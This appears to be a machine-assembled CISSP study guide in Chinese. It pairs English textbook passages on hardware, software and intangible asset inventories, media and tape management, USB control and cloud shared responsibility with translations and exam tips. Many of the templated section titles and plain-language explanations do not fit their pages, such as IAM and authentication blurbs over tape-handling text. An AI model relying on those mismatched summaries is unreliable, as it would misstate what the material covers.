问最终责任,通常不是管理员,而是 senior management。

Owner 定规则,Custodian 执行保护。

Custodian 常是 IT/运维角色。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
高级管理者 高级管理者承担安全最终责任。
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
数据保管者 数据保管者按所有者要求实施备份、访问控制等保护。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 16 / PDF P1102

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

deployed. On a regular basis, personnel scan all of the bar codes with a barcode reader to verify that the organization still controls the hardware. A similar method uses radio frequency identification (RFID) tags. These tags transmit information to RFID readers. Personnel place the RFID tags on the equipment and use the RFID readers to inventory the equipment. RFID tags and readers are more expensive than bar codes and bar-code readers. However, RFID methods significantly reduce the time needed to perform an inventory. Before disposing of equipment, personnel sanitize it. Sanitizing equipment removes all data to ensure that unauthorized personnel do not gain access to sensitive information.

When equipment is at the end of its lifetime, it's easy for individuals to lose sight of the data that it contains, so using checklists to sanitize the system is often valuable. Checklists can include steps to sanitize hard drives, nonvolatile memory, and removable media such as CDs, DVDs, and USB flash drives within the system. NIST 800-88r1 and Chapter 5 have more information on procedures to sanitize drives. Portable media, such as USB drives, holding sensitive data is also managed as an asset. For example, an organization can label portable media with bar codes and use a bar-code inventory system to complete inventories on a regular basis.

This approach allows them to inventory the media holding sensitive data on a regular basis. Software Asset Inventories Software assets are operating systems and applications. Organizations pay for software, and license keys are routinely used to activate the software. The activation process often requires contacting a licensing server over the Internet to prevent piracy. If the license keys are leaked outside the organization, it can invalidate the organization's use. It's also important to monitor license compliance to avoid legal issues. For example, an organization could purchase a license key for five software product installations but only install and activate one instance immediately.

If the key is stolen and installed on four systems outside the organization, those activations will succeed. When the organization tries to install the application on internal systems, the activation will fail. Any type of license key is highly valuable to an organization and should be protected. Software licensing also refers to ensuring that systems do not have unauthorized software installed. Many tools are available that can inspect

中文直译 / 整理

部署前会贴上条形码。 定期地,工作人员使用条形码阅读器扫描所有条形码,以 确认组织仍对硬件拥有控制权。 一种类似的方法使用射频识别(RFID)标签。 这些标签向RFID读写器传输信 息。 工作人员将RFID标签贴在设备上,并使用RFID读写器对设备进行盘点。 RFID标签和读写器比条形码和条形码读写器更昂贵。 然而,RFID方法显著减少了执行盘点所需的时间。 在处置设备之前,工作人员会对其进行清理。 清理设备可以删除所有数据,以 确保未经授权的人员无法访问敏感信息。 当设备到达使用寿命末期时,个人很 容易忽视其包含的数据,因此使用检查清单来清理系统通常很有价值。 检查清 单可以包括清理硬盘、非易失性存储器以及系统内的可移动介质(如CD、 DVD和USB闪存驱动器)的步骤。 NIST 800‑88r1 和 第5章 提供了更多关于 清理驱动器程序的信息。 便携式介质(如USB驱动器),若存储敏感数据,也作为资产进行管理。 例如, 组织可以使用条形码标记便携式介质,并使用条形码盘点系统定期完成盘点。 这种方法使他们能够定期对存储敏感数据的介质进行盘点。 软件资产清单 软件资产包括操作系统和应用程序。

组织为软件付费,并通常使用许可证密钥 来激活软件。 激活过程通常需要通过互联网联系许可服务器,以防止盗版。 如 果许可证密钥泄露到组织外部,可能会导致组织的使用失效。 同时,监控许可 证合规性以避免法律问题也非常重要。 例如,一个组织可能购买了五个软件产品安装的许可证密钥,但只立即安装 并激活了一个实例。 如果该密钥被盗并在组织外部的四台系统上安装,这些 激活将成功。 当组织尝试在内部系统上安装该应用程序时,激活将失败。 任 何类型的许可证密钥对组织都极具价值,应加以保护。 软件许可还指确保系统未安装未经授权的软件。 有许多工具可用于远程检查

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 17 / PDF P1103

第 1103 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

systems remotely to detect the system's details. This allows them to identify unauthorized software running on systems, and helps an organization ensure that it complies with software licensing rules. Intangible Inventories Organizations don't inventory intangible resources in the same way as tangible inventories. However, an organization needs to keep track of intangible assets to protect them. Because these are intellectual assets (such as intellectual property, patents, trademarks, a company's reputation, and copyrights) instead of physical assets, it's difficult to assign them a monetary value. The senior management team is typically the owner of these assets.

They attempt to determine the value of intangible assets by estimating the benefits the assets will bring to the organization. As an example, imagine a company sells a product based on a patent. The revenue from these sales can be used to assign a value to the patent. Utility and plant patents in the United States are valid for 20 years and design patents for 15 years, so this time frame can also be used when calculating the value. The United States requires payment of maintenance fees periodically to maintain the patent. Failing to pay these fees can result in a loss of the patent, stressing the importance of tracking patents.

Large organizations report the value of intangible assets on their balance sheets using generally accepted accounting principles (GAAP). This helps them review their intangible assets at least annually. Apply Resource Protection Organizations apply various resource protection techniques to ensure that resources are provisioned securely and managed throughout their life cycle. As an example, desktop computers are often deployed using imaging techniques to ensure that they start in a known secure state. Change management and patch management techniques ensure that the systems are kept up-to-date with required changes.

Imaging, change management, and patch management topics are discussed later in this chapter. Information is stored on media, so an essential part of resource protection is protecting media. This includes when storing media and when the media reaches the end of its life cycle.

中文直译 / 整理

系统的详细信息。 这使它们能够识别系统上运行的未经授权的软件,并帮助组 织确保遵守软件许可规则。 无形资产 组织并不会像管理有形资产那样对无形资源进行盘点。 然而,组织需要跟踪无 形资产以保护它们。 由于这些是知识产权(如知识产权、专利、商标、公司声 誉和版权)而非实物资产,因此很难为其赋予货币价值。 高级管理团队通常是这些资产的所有者。 他们通过估算这些资产将为组织带来 的收益来确定无形资产的价值。 例如,假设一家公司销售基于专利的产品,这 些销售的收入可用于为专利定价。 在美国,实用新型和植物专利的有效期为20 年,外观设计专利为15年,因此这一期限也可用于计算价值。 美国要求定期支 付维护费以维持专利的有效性。 未能支付这些费用可能导致专利失效,这突显 了跟踪专利的重要性。 大型组织根据公认会计原则(GAAP)在其资产负债表上报告无形资产的 价值。 这有助于它们至少每年审查一次其无形资产。 应用资源保护 组织应用各种资源保护技术,以确保资源安全配置并在其整个生命周期内得到 管理。 例如,台式计算机通常采用镜像技术部署,以确保它们从已知的安全状 态启动。 变更管理和补丁管理技术可确保系统及时更新所需变更。

镜像、变更 管理和补丁管理主题将在本章后面讨论。 信息存储在介质上,因此资源保护的一个重要部分是保护介质。 这包括介质存 储期间以及介质生命周期结束时。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1103 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 18 / PDF P1104

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Media Management Media management refers to the steps taken to protect media and data stored on media. In this context, media is anything that can hold data. It includes tapes, optical media such as CDs and DVDs, portable USB drives, internal hard drives, solid-state drives, and USB flash drives. Many portable devices, such as smartphones, fall into this category because they include memory cards that can hold data. Backups are often contained on tapes, so media management directly relates to tapes. However, media management extends beyond just backup tapes to any type of media that can hold data. It also includes any type of hard-copy data.

Media Protection Techniques When media includes sensitive information, it should be stored in a secure location with strict access controls to prevent losses due to unauthorized access. Additionally, any location used to store media should have temperature and humidity controls to prevent losses due to corruption. Media management can also include technical controls to restrict device access from computer systems. As an example, many organizations use technical controls to block the use of USB drives and/or detect and record when users attempt to use them.

In some situations, a written security policy prohibits the use of USB flash drives, and automated detection methods detect and report any violations. The primary risks from USB flash drives are malware infections and data theft. A system infected with a virus can detect when a user inserts a USB drive and infect it. When the user inserts this infected drive into another system, the malware attempts to infect the second system. Additionally, malicious users can easily copy and transfer large amounts of data and conceal the drive in their pocket. Properly managing media directly addresses confidentiality, integrity, and availability.

When media is marked, handled, and stored properly, it helps prevent unauthorized disclosure (loss of confidentiality), unauthorized modification (loss of integrity), and unauthorized destruction (loss of availability).

中文直译 / 整理

媒体管理 介质管理是指为保护介质及其上存储的数据所采取的步骤。 在此背景下,介质 是指任何能够存储数据的载体,包括磁带、光盘(如CD和DVD)、便携式 USB驱动器、内部硬盘、固态硬盘和USB闪存驱动器。 许多便携式设备(如智 能手机)也属于此类,因为它们包含可存储数据的存储卡。 备份通常存储在磁 带上,因此介质管理与磁带直接相关。 然而,介质管理不仅限于备份磁带,还 包括任何能够存储数据的介质,还涵盖任何类型的纸质数据。 媒体保护技术 当媒体包含敏感信息时,应将其存储在具有严格访问控制的安全位置,以防 止因未经授权的访问而导致的损失。 此外,用于存储媒体的任何位置都应具 备温湿度控制措施,以防止因损坏而导致的损失。 媒体管理还可以包括技术控制措施,以限制计算机系统对设备的访问。 例如, 许多组织使用技术控制措施来阻止使用USB驱动器,或检测并记录用户尝试使 用它们的情况。 在某些情况下,书面的安全策略禁止使用USB闪存驱动器,并 通过自动化检测方法发现并报告任何违规行为。 USB闪存驱动器的主要风险是恶意软件感染和数据窃取。 感染了病毒的 系统可以在用户插入USB驱动器时检测到并感染该驱动器。

当用户将此感染 的驱动器插入另一台系统时,恶意软件会尝试感染第二台系统。 此外,恶意 用户可以轻松复制和传输大量数据,并将驱动器藏在口袋中。 妥善管理媒体直接解决了机密性、完整性和可用性问题。 当媒体被正确标 记、处理和存储时,有助于防止未经授权的披露(机密性丧失)、未经授 权的修改(完整性丧失)和未经授权的销毁(可用性丧失)。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 19 / PDF P1105

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Controlling USB Flash Drives Many organizations restrict the use of USB flash drives to specific brands purchased and provided by the organization. This strategy allows the organization to protect data on the drives and ensure that the drives are not being used to inadvertently transfer malicious software (malware) between systems. Users still have the benefit of USB flash drives, but this practice reduces risk for the organization without hampering the user's ability to use USB drives. For example, some organizations sell IronKey flash drives that include multiple levels of built-in protection.

Several authentication mechanisms are available to ensure that only authorized users can access data on the drive. Such drives protect data with built-in AES 256-bit hardware-based encryption. Active antimalware software on the flash drive helps prevent malware from infecting the drive. Some products include additional management solutions, allowing administrators to manage the devices remotely. For example, administrators can reset passwords, activate auditing, and update the devices from a central location. Tape Media Organizations commonly store backups on tapes, and tapes are highly susceptible to loss due to corruption.

As a best practice, organizations should keep at least two copies of backups. They should maintain one copy on-site for immediate usage if necessary and store the second copy at a secure location off-site. If a catastrophic disaster such as a fire destroys the primary location, the data is still available at the alternate location. The cleanliness of the storage area will directly affect the life span and usefulness of tape media. Additionally, magnetic fields can act as a degausser and erase or corrupt data on the tape. With this in mind, tapes should not be exposed to magnetic fields that can come from sources such as elevator motors and some printers.

Here are some useful guidelines for managing tape media: Keep new media in its original sealed packaging until it's needed to protect it from dust and dirt.

中文直译 / 整理

控制USB闪存驱动器 许多组织将USB闪存驱动器的使用限制为由组织购买并提供的特定品牌。 这种策略使组织能够保护驱动器上的数据,并确保驱动器不会被无意中用 于在系统之间传输恶意软件(恶意程序)。 用户仍能受益于USB闪存驱动 器,但这种做法在不影响用户使用USB驱动器能力的同时,降低了组织的 风险。 例如,一些组织销售IronKey闪存驱动器,这些驱动器内置了多层保护机 制。 多种身份验证机制可用于确保只有授权用户才能访问驱动器上的数据。 此类驱动器通过内置的AES 256位硬件加密保护数据。 驱动器上的主动反 恶意软件可帮助防止恶意软件感染驱动器。 一些产品包含额外的管理解决方案,允许管理员远程管理设备。 例如, 管理员可以从中央位置重置密码、启用审计功能并更新设备。 磁带介质 组织通常将备份存储在磁带上,而磁带极易因损坏而丢失。 作为最佳实践,组 织应至少保留两份备份副本。 一份应保存在本地,以便在必要时立即使用; 另 一份应存放在安全的异地位置。 如果发生火灾等灾难性事件导致主位置损毁, 数据仍可在备用位置获取。 存储环境的清洁度将直接影响磁带介质的使用寿命和可用性。

此外,磁场可能 充当消磁器,擦除或破坏磁带上的数据。 因此,磁带不应暴露于电梯电机和某 些打印机等来源产生的磁场中。 以下是管理磁带介质的一些实用指南: 请将新介质保持在原密封包装中,直到使用时,以防止灰尘和污垢污染。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
学习单元 20 / PDF P1106

第 1106 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

When opening a media package, take extra caution not to damage the media in any way. This includes avoiding sharp objects and not twisting or flexing the media. Avoid exposing the media to temperature extremes; it shouldn't be stored close to heaters, radiators, air conditioners, or other sources of extreme temperatures. Do not use media that has been damaged, exposed to abnormal levels of dust and dirt, or dropped. Media should be transported from one site to another in a temperaturecontrolled vehicle. Media should be protected from exposure to the outside environment; avoid sunlight, moisture, humidity, heat, and cold. It should be acclimated for 24 hours before use.

Appropriate security should be maintained over media from the point of departure to the secured off-site storage facility. Media is vulnerable to damage and theft at any point during transportation. Appropriate security should be maintained over media throughout the lifetime of the media based on the classification level of data on the media. Consider encrypting backups to prevent unauthorized disclosure of data if the backup tapes are lost or stolen. Mobile Devices Mobile devices include laptops, smartphones, tablets, and smartwatches. These devices have internal memory or removable memory cards that can hold a significant amount of data.

Data can include email with attachments, contacts, and scheduling information. Additionally, many devices include applications that allow users to read and manipulate different types of documents. Chapter 9, “Security Vulnerabilities, Threats, and Countermeasures,” covered mobile devices in much more depth. The key is to remember that mobile devices include data storage abilities. If they are storing sensitive data, it's important to take steps to protect that data. Managing Media Life Cycle

中文直译 / 整理

打开介质包装时,请格外小心,避免以任何方式损坏介质。 包括避免使 用尖锐物体,以及不要扭曲或弯曲介质。 避免将媒体暴露在极端温度下; 不应将其存放在加热器、散热器、空调或其他极端 热源附近 温度。 请勿使用已受损、暴露于异常程度的 灰尘和污垢,或掉落过的媒体。 媒体应在温度受控的车辆中从一个地点运输到另一个地点。 媒体应避免暴露于外部环境; 请远离阳光、湿气、湿度、高温和低温。 使用前应使其适应环境24小时。 从起点到安全的异地存储设施,应对介质保持适当的安保措施。 在运输过 程中,介质随时可能遭受损坏或被盗。 应根据介质上数据的分类级别,在介质的整个生命周期内对其保持适当 的安保措施。 考虑对备份进行加密,以防止备份磁带丢失或被盗时数据被未经授权泄露。 移动设备 移动设备包括笔记本电脑、智能手机、平板电脑和智能手表。 这些设备具有 内部存储器或可移除存储卡,可存储大量数据。 数据可能包括带附件的电子 邮件、联系人和日程信息。 此外,许多设备包含允许用户阅读和操作不同类 型文档的应用程序。 第9章,“安全漏洞、威胁与对策”深入探讨了移动设备。 关键是要记住,移 动设备具有数据存储功能。

如果它们存储了敏感数据,则必须采取措施保护这 些数据。 管理介质生命周期

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1106 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 21 / PDF P1107

第 1107 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

All media has a useful but finite life cycle. Reusable media is subject to a mean time to failure (MTTF) that is sometimes represented in the number of times it can be reused or the number of years you can expect to keep it. For example, some tapes include specifications saying they can be reused as many as 250 times or last up to 30 years under ideal conditions. However, many variables affect the lifetime of media and can reduce these estimates. It's important to monitor backups for errors and use them as a guide to gauge the lifetime in your environment. When a tape begins to generate errors, technicians should rotate it out of use.

Chapter 10, “Physical Security Requirements,” covered MTTF in more depth in the context of equipment failure. Once backup media has reached its MTTF, it should be destroyed. The classification of data held on the tape will dictate the method used to destroy the media. Some organizations degauss highly classified tapes when they've reached the end of their lifetime and then store them until they can destroy the tapes. It's common to destroy tapes in bulk shredders. Chapter 5 discusses some of the security challenges with solid-state drives (SSDs). Specifically, degaussing does not remove data from an SSD, and builtin erase commands often do not sanitize the entire disk.

Instead of attempting to remove data from SSDs, many organizations destroy them. MTTF is different from mean time between failures (MTBF). MTTF is normally calculated for items that will not be repaired when they fail, such as a tape. In contrast, MTBF refers to the amount of time expected to elapse between failures of an item that personnel will repair, such as a computer server. Managed Services in the Cloud Cloud-based assets include any resources that an organization accesses using cloud computing. You may see these referred to as managed services. Cloud computing refers to on-demand access to computing resources available from

中文直译 / 整理

所有媒体都有一个有用但有限的生命周期。 可重复使用的媒体受平均无故障时 间(MTTF)限制,该时间有时以可重复使用的次数或预期使用年限表示。 例如, 某些磁带的规格说明在理想条件下可重复使用多达250次,或最长可使用30年。 然而,许多变量会影响媒体的寿命,并可能降低这些估算值。 重要的是监控备 份中的错误,并将其作为评估您环境中媒体寿命的依据。 当磁带开始产生错误 时,技术人员应将其退出使用。 第10章,“物理安全要求”,更深入地探讨了在设备故障背景下 MTTF的相关内容。 一旦备份介质达到其MTTF,就应予以销毁。 磁带上存储数据的分类将决定销 毁介质所使用的方法。 一些组织在磁带达到使用寿命后,会对其进行消磁,然 后储存起来,直至可以销毁。 通常使用批量碎纸机销毁磁带。 第5章讨论了固态硬盘(SSD)的一些安全挑战。 具体而言,消磁无法清除 SSD上的数据,且内置的擦除命令通常无法彻底清理整个磁盘。 因此,许多组 织选择直接销毁SSD,而不是尝试清除其上的数据。 MTTF与平均故障间隔时间(MTBF)不同。 MTTF通常用于计算那些 发生故障后不会被修复的物品,例如磁带。

相比之下,MTBF指的是人员将 进行修复的物品(如计算机服务器)在两次故障之间预期经过的时间。 云中的托管服务 基于云的资产包括组织使用云计算访问的任何资源。 您可能会看到这些资源被 称为托管服务。 云计算是指按需访问来自

小白解释

场景先行:你是公司的安全负责人,正在读第 1107 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1107 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 22 / PDF P1108

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

almost anywhere, and cloud computing resources are highly available and easily scalable. Organizations typically lease cloud-based resources from outside the organization, but they can also host on-premises resources within the organization. One of the primary challenges with cloud-based resources hosted outside the organization is that they are outside the organization's direct control, making it more difficult to manage the risk. Although the on-premises cloud provides the organization with much greater control, hosting resources in the cloud offers convenience. Some cloud-based services only provide data storage and access.

When storing data in the cloud, organizations must ensure that security controls are in place to prevent unauthorized access to the data. Additionally, organizations should formally define requirements to store and process data stored in the cloud. For example, the Department of Defense (DoD) Cloud Computing Security Requirements Guide (CC SRG) defines specific requirements for U.S. government agencies to follow when evaluating the use of cloud computing assets. This document identifies computing requirements for assets labeled Secret and below using six separate information impact levels. All sensitive data should be encrypted.

This includes data in transit as it is sent to the cloud and data at rest while it's stored. The DoD CC SRG states that the customer should manage encryption, including controlling all encryption keys. In other words, customers should not use encryption controlled by the vendor. This eliminates risks related to insider threats at the vendor and supports data destruction using cryptographic erase methods. Cryptographic erase methods permanently remove the cryptographic keys. If a strong encryption method is used, cryptographic erase methods ensure that data remains inaccessible.

Shared Responsibility with Cloud Service Models There are varying levels of maintenance and security responsibilities for assets, depending on the service model. This includes maintaining the assets, ensuring that they remain functional, and keeping the systems and applications up-to-date with current patches. Figure 16.1 (derived from Figure 2 in the DoD CC SRG) shows how vendors and customers share the maintenance and security responsibilities for the

中文直译 / 整理

几乎任何地方的计算资源,云计算资源具有高可用性和易于扩展性。 组织通常 从组织外部租赁基于云的资源,但也可以在组织内部托管本地资源。 托管在组织外部的基于云的资源的主要挑战之一是,它们超出了组织的直接控 制范围,使得风险管理更加困难。 尽管本地云为组织提供了更大的控制权,但 在云中托管资源则更具便利性。 一些基于云的服务仅提供数据存储和访问功能。 当将数据存储在云中时,组织 必须确保实施了安全控制措施,以防止未经授权的数据访问。 此外,组织应正 式定义存储和处理云中数据的要求。 例如,美国国防部(DoD)云计算安全要 求指南(CC SRG)规定了美国政府机构在评估云计算资产使用时应遵循的具体 要求。 该文件使用六个独立的信息影响级别,明确了标记为机密及以下级别的 资产的计算要求。 所有敏感数据都应进行加密。 这包括在传输至云过程中以及存储期间的数据。 DoD CC SRG 指出,客户应管理加密过程,包括控制所有加密密钥。 换句话说, 客户不应使用由供应商控制的加密方式。 这可以消除与供应商内部威胁相关的 风险,并支持使用密码擦除方法进行数据销毁。 密码擦除方法会永久删除加密 密钥。

如果使用了强加密方法,密码擦除方法可确保数据无法被访问。 与云服务模型相关的共同责任 根据服务模型的不同,对资产的维护和安全责任也有所不同。 这包括维护资产、 确保其正常运行,以及及时为系统和应用程序应用最新补丁。 图 16.1(源自 DoD CC SRG 中的图 2)展示了供应商和客户在

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

